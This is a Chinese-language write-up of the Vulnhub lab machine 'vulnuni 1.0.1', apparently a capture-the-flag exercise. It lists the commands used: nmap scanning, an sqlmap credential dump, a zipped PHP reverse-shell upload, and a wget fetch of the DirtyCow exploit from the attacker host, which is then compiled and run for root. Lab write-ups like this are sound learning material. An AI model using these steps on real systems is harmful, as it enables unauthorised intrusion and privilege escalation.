Vulnhub:vulnuni1.0.1靶机

kali:192.168.111.111

靶机:192.168.111.192

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.192

image

owasp-zap爬虫发现目录

image

image

漏洞利用

登录点存在sql注入,burp抓包保存成txt,用sqlmap利用,获得账号密码:admin|ilikecats89

sqlmap -o -r ./a.txt --batch --level 5 --risk 3 -D 'eclass' -T 'user' -C 'username,password' --dump

image

/vulnuni-eclass/modules/course_info/restore_course.php可以上传文件

image

把反弹shell的php脚本压缩成zip格式上传,上传后会自动解压到/vulnuni-eclass/courses/tmpUnzipping

image

提权

内核版本

image

dirtycow提权

searchsploit -p 40616

image

python开启http服务

python3 -m http.server

image

靶机下载

wget http://192.168.111.111:8000/40616.c

image

40616.c使用方法

image

gcc 40616.c -o exp -pthread
./exp

image

获得flag

image

posted @ 2023-02-15 17:24  ctostm  阅读(46)  评论(0)    收藏  举报